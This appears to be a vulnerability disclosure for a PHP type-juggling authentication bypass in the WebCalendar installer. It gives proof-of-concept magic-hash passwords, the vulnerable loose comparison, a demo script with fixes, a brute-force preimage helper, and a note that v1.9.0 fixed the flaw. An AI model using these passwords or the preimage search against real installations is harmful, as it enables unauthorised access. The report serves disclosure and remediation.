Type Confusion in craigk5n/webcalendar
Reported on
Oct 1st 2021
Description
When two values are compared with PHP's loose comparison operator (==), PHP first converts them to a common, comparable type. In particular, two strings that both look numeric are compared as numbers, so "0e123" == "0e456" is true because both parse as the number 0. This behaviour (type juggling) leads to a variety of problems and is a well-known source of security vulnerabilities.
https://github.com/craigk5n/webcalendar has a type juggling vulnerability in its installer that allows an authentication bypass, as shown below:
Proof of Concept
webcalendar hashes the user-provided installer password with unsalted MD5 and stores the digest in a configuration file as follows:
fwrite( $fd, '<?php' . "\r\n" . 'install_password: ' . md5( $pwd1 )
. "\r\n?>\r\n" );
fclose( $fd );
Later it uses this configuration file to perform the authentication check. Under certain circumstances this check can be bypassed because of type juggling and "magic hashes": inputs whose MD5 digest matches /^0e[0-9]+$/ and is therefore treated by == as the number 0.
Payload: go to http://localhost/webcalendar-master/install/index.php and enter the password:
UEaXPm4IIDp3
This generates the settings file /var/www/html/webcalendar-master/includes/settings.php with the following content:
<?php
install_password: 0e461721121374870411609769578212
?>
The following block checks the password, but uses == to verify it. Since the stored digest is a numeric string that evaluates to 0, any candidate whose MD5 digest also matches /^0e[0-9]+$/ compares equal to it; this holds in PHP 8 as well, because two numeric strings are still compared numerically. That makes the check vulnerable to an auth bypass using type conversion magic hashes:
if( md5( $pwd ) == $password ) {
$_SESSION['validuser'] = $password;
echo translate( 'Password Accepted' ) . '</title>
<meta http-equiv="refresh" content="0; index.php" />
</head>
Now go to http://localhost/webcalendar-master/install/index.php again and enter a different password whose MD5 digest is also a magic hash, for example:
wzXzQTGIx9VU
and observe that the password is accepted.
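The comparison bug can be reproduced outside WebCalendar. The script below is an added example written for this page, not the project's own code: it uses two published magic-hash preimages (240610708 and QNKCDZO) rather than the PoC passwords, its function names are illustrative, and it places the loose check beside two fixes (hash_equals on the stored digest, and password_hash/password_verify instead of unsalted MD5). It also includes a small brute-force helper to show how the second PoC password is obtained.

```php
<?php
// Added example, not WebCalendar's code. Reproduces the installer's
// `md5( $pwd ) == $password` bug in isolation and shows the fix.
// The two preimages below are well-known published magic-hash inputs.

declare(strict_types=1);

// A 32-char MD5 hex digest matching this is a numeric string equal to 0.
const MAGIC_HASH_RE = '/^0e[0-9]+$/';

// Vulnerable check, same shape as the installer's code. With ==, two numeric
// strings are compared as numbers; "0e<digits>" parses as the float 0.0,
// so any two magic hashes compare equal (PHP 7 and PHP 8 alike).
function loose_check(string $candidate, string $storedMd5): bool
{
    return md5($candidate) == $storedMd5;
}

// Minimal fix: compare the digests byte-for-byte and in constant time.
function strict_check(string $candidate, string $storedMd5): bool
{
    return hash_equals($storedMd5, md5($candidate));
}

// Better fix: do not store unsalted MD5 at all. password_hash() salts and
// uses a slow algorithm; password_verify() compares in constant time.
function store_password(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

function verify_password(string $candidate, string $storedHash): bool
{
    return password_verify($candidate, $storedHash);
}

// True if this hex digest would be treated as the number 0 by ==.
function is_magic_hash(string $hexDigest): bool
{
    return preg_match(MAGIC_HASH_RE, $hexDigest) === 1;
}

// How an attacker finds a second password: hash candidate strings until the
// digest matches the pattern. About 1 in 3e8 MD5 digests does, so a real
// search needs a budget in the hundreds of millions; returns null if the
// budget runs out first.
function find_magic_md5_preimage(int $budget, string $prefix = 'wc'): ?string
{
    for ($i = 0; $i < $budget; $i++) {
        $candidate = $prefix . base_convert((string) $i, 10, 36);
        if (is_magic_hash(md5($candidate))) {
            return $candidate;
        }
    }
    return null;
}

// Published magic-hash preimages: their digests are
// 0e462097431906509019562988736854 and 0e830400451993494058024219903391.
$installPassword = '240610708';
$attackerGuess   = 'QNKCDZO';

$storedMd5 = md5($installPassword);
printf("stored digest is a magic hash: %s\n", is_magic_hash($storedMd5) ? 'yes' : 'no');
printf("loose  check, wrong password: %s\n", loose_check($attackerGuess, $storedMd5) ? 'accepted' : 'rejected');
printf("strict check, wrong password: %s\n", strict_check($attackerGuess, $storedMd5) ? 'accepted' : 'rejected');

$storedHash = store_password($installPassword);
printf("password_verify, wrong password: %s\n", verify_password($attackerGuess, $storedHash) ? 'accepted' : 'rejected');
printf("password_verify, right password: %s\n", verify_password($installPassword, $storedHash) ? 'accepted' : 'rejected');

// Small budget so the script finishes quickly; a hit here is unlikely.
$found = find_magic_md5_preimage(200000);
printf("brute-force within budget: %s\n", $found ?? 'none found (expected with a small budget)');
```

Run it with PHP 7 or 8. loose_check() accepts the wrong password because both digests are numeric strings equal to 0, while strict_check() and verify_password() reject it. The brute-force helper will almost always return null with the budget given; finding a fresh preimage takes on the order of 10^8 MD5 computations, which is cheap for an attacker but not something to wait for in a demo.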
Impact
This vulnerability allows anyone who can reach the installer to bypass its password check without knowing the configured install password.
Occurrences
SECURITY.md
There is an open pull request that addresses this issue: https://github.com/craigk5n/webcalendar/pull/250/files It should be merged into master in the next week.
This has been merged into master and bootstrap-ui branches.
The fix for this was included in the WebCalendar v1.9.0 release.